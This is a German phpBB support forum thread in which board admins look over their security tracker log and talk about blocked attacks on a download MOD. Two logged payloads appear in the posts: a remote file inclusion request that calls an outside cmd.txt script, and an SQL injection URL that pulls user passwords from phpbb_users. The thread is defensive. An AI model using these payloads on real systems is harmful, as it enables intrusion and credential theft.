OXPUS.de

phpBB-Support, PC Hilfe und vieles mehr...
https://www.oxpus.de:443/

Ctracker Logfile-Auswertung

https://www.oxpus.de:443/viewtopic.php?t=7554

Seite 1 von 1

Ctracker Logfile-Auswertung

Verfasst: So 01.Jul, 2007 22:22
von bce
:eek: hab gerade mal wieder die logfiles des ctracker angeschaut und musste folgende einträge feststellen:
3 10.06.2007, 13:03 /downloads.php?id=http://lifechangerscc.com//catalog/includes/cmd.txt? libwww-perl/5.803 80.69.46.230

4 10.06.2007, 13:03 /downloads.php?id=154&view=detail/downloads.php?id=http://lifechangerscc.com//catalog/includes/cmd.txt?
wollte mir wohl einer was unterjubeln :(
aber der ctracker hat zum glück geblockt.

Verfasst: So 01.Jul, 2007 23:25
von oxpus
wollte mir wohl einer was unterjubeln
Yepp und hätte damit eh keinen Erfolg gehabt, auch ohne den CT, denn die Variable $id wäre spätestens bei der Übernahme in diesem Fall eine 0 geworden und in den neuen Versionen des MODs überhaupt nicht mehr beachtet, da sie durch eine andere Variable ersetzt wurde.

Aber immer wieder nett zu erfahren, wie dreist sie Idioten es versuchen, ein Board zu knacken.
Hier wollte wohl jemand den Download MOD schlecht machen. Hätte er Erfolg gehabt, wäre der MOD sofort überall in den einschlägigen Seiten zu finden gewesen, aber genau darauf hatte ich schon von Anfang an geachtet :D

Verfasst: Mo 02.Jul, 2007 10:11
von bce
dann bin ich ja beruhigt.
prima arbeit oxpus! der mod ist nach wie vor TOP.

Verfasst: Mo 02.Jul, 2007 12:50
von oxpus
prima arbeit oxpus! der mod ist nach wie vor TOP.
Danke danke, hört man immer wieder gerne, daß die geleistete Arbeit ankommt.

Verfasst: Di 14.Aug, 2007 22:54
von bce
diesen eintrag hatte ich letztens paarmal drin:
/downloads.php??cat=-1%20union%20select%200,user_icq,user_password,0,0,0,0,0,0%20from%20phpbb_users%20where%20user_icq0/*

Verfasst: Mi 15.Aug, 2007 03:33
von AmigaLink
Ich würde sagen, da hat einer Versucht ob im Download MOD eine Schwachstelle ist, über die man SQL abfragen einschleusen kann.
Sowas hab ich ständig im log. Sogar für MODs die gar nicht bei mir installiert sind. :p

Verfasst: Mi 15.Aug, 2007 06:25
von Christian_N
[quote="AmigaLink";p="75800"]Sowas hab ich ständig im log. Sogar für MODs die gar nicht bei mir installiert sind. :p[/quote] :rofl: war bei mir auch schon mal, oder habe auch ein Errorpage MOD installiert der eigentlich für Orion war (hab den eben fürs vanilla etwas anpassen müssen) wo mir im Log angezeigt wird das die search.php bzw. memberlist.php bei der Fanpage ne Bot versucht hat diese anzeigen zulassen und der nur 404 Fehler dadurch bekam :D

Naja, was will man machen :D

Verfasst: Mi 15.Aug, 2007 11:00
von oxpus
Diese Anfrage hätte im Download MOD keine Auswirkungen und würde mit einer Fehlermeldung quittiert, bevor überhaupt irgendwas anderes herangezogen würde.
Also kein Grund zur Panik.
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de